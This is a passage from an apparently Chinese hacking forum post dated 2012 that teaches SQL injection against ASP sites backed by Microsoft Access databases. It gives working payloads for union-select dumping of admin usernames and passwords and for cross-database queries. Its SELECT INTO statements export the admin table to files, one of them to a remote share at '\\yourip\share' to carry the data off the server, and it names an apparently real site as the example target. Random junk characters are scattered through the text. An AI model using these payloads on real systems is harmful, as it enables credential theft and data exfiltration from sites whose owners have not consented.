找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2180|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------
8 s6 J* t9 D( I' i" c6 S3 |8 f. \/ t: nunion查询法8 `4 n" M1 V7 z" M( q! g
首先要说的就是查询办法,一般的查询办法就是8 f% W$ Y; r, |& @8 o- v

0 \8 K" v6 |3 X7 r程序代码
9 P3 V, _% P3 N( V# vand 1=(select count(*) from admin where left(id,1)='1')3 X) i0 l1 ]+ h* B4 X  a

) `, k( Q$ N# |7 ]: e* s4 J- C这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
  X" \# ?1 m& l1 j4 a7 t所以这个时候,union select横空出现.别以为只能在PHP里用哦...! I+ B2 `2 R8 {2 R# p2 |
譬如你有一个ACCESS点:; K1 F" _+ r6 Q; |2 E
程序代码
% [& O& _$ m' d* e3 m7 n" A% yhttp://bbs.tian6.com/xiaoyang.asp?coder=1
- D: u+ [/ [6 P5 Z8 r0 B0 k$ @0 A. N3 E) F: h; @$ [6 y8 p( y& A
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),& @& n1 G/ f4 h0 S! \0 a( }
然后我们直接来:
$ ~6 ?4 g; ]7 T1 ?2 @% s+ U1 J程序代码
3 x  S; l! v5 e& m9 G5 Y4 J1 _4 |http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]# u9 H' V3 W9 ~8 W

' |$ X) H. J. x: }这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
: g. q; c- d& j" N" B+ b
+ W0 O7 I5 K: z- Z0 S" c2 u
! G, L3 m; o& w/ R
: `+ g8 p; e7 f& K/ g---------------------------------------------------------------: q" o( S* j* H# m) t4 }5 B+ |
Access跨库查询2 K! k7 }' `6 R6 x+ R; f0 [
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
. m5 Y8 \) Y: j8 n( c; R. r) ]跨库的查询语句:* l( L% M6 j- _1 F# O1 `) o* N7 {
子查询:
# I7 n: q& T8 }* {6 o4 v) [程序代码
8 }$ b) z) ^! T* |' L9 \3 B3 eand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>05 D% X3 v- [! j4 U8 Q
) e5 t4 C7 B# n, i2 d  Q" H
union查询:4 M* O+ q4 C3 N" t
程序代码
/ ]( A4 M* z7 M5 s+ zunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1& [9 X& ?2 @5 a" N; M$ w
& a9 `" r8 V$ k5 U  Z
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
/ E- T; U2 v( e6 E$ P, @. V  i程序代码/ o3 j5 b8 A7 X$ B9 \. a
http://www.4ngel.net/article/46.htm . Q+ l/ T# V8 R+ t, I& _
http://hf110.com/Article/hack/rqsl/200502/66.html
' @6 a& R2 u: L
/ _8 w5 j% Z+ T  Y---------------------------------------------------------------" a: Q7 t1 [% @% O0 N( q: D
Access注入,导出txt,htm,html
; Y3 U5 |7 y7 l8 A$ i, b子查询语句:
% D+ {& _3 o6 W程序代码- B2 d* S) c1 I4 A( \7 v2 C$ ?: `5 F
Select * into [test.txt] in 'd:\web\' 'text;' from admin. R9 {9 B9 y7 A" u, F! z. E) T
8 H- I, |" w/ U) W! e- V
这样就把admin表的内容以test类型存进了d:\web里面.3 o9 w+ L) v# _. d
UNION查询:
0 u) y5 s! ]1 E: d& r程序代码5 Y& r! V, L0 z" v+ M3 P  V
union select * into [admin.txt] in 'c:\' 'test;' from admin- V- \' d. T& n8 I0 m9 P/ g

6 N* w$ V  N+ _! q* J# ^4 ?6 n而且这里也可以保存到本地来:9 N7 Q; C( u7 b. v
程序代码
! B) w2 I( d# p! jSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
$ \$ _1 n: `& X# R) j, [2 b. O! R7 Y1 N3 j5 r; m) L
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:- @( N& \. ^( M5 P4 H  F

- H* [  P, l0 g0 J# n4 n程序代码
+ f+ v2 _* ]* V) ]http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
. [! F- q1 a4 l' X1 \1 l! F9 Y+ W. \6 w0 ^
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.# u: y- H& }) Q! |% \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表